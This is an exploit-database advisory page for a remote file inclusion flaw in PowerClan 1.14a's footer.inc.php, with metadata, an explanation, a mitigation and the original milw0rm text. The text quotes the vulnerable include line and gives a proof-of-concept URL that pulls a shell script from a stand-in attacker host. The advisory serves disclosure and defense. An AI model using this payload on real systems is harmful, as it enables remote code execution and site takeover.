header-logo
Suggest Exploit
vendor:
PowerClan
by:
nuffsaid
7,5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: PowerClan
Affected Version From: PowerClan <= 1.14a
Affected Version To: PowerClan <= 1.14a
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability

PowerClan footer.inc.php does not initialize the $settings[footer] variable before using it to include files, assuming register_globals = on, we can initialize the variable in a query string and include a remote file of our choice.

Mitigation:

Initialize the $settings[footer] variable before using it to include files.
Source

Exploit-DB raw data:

+-------------------------------------------------------------------------------------------
+ PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://www.powerscripts.org/
+ Affected Software .: PowerClan <= 1.14a
+ Download ..........: http://ftp.powerscripts.org/pc/powerclan114a.zip
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ PowerClan footer.inc.php does not initialize the $settings[footer] variable before using it
+ to include files, assuming register_globals = on, we can initialize the variable in a query
+ string and include a remote file of our choice.
+
+ Vulnerable Code:
+ footer.inc.php, line(s) 24:
+ -> 24: include($settings[footer]);
+
+ Proof Of Concept:
+ http://[target]/[path]/footer.inc.php?settings[footer]=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-21]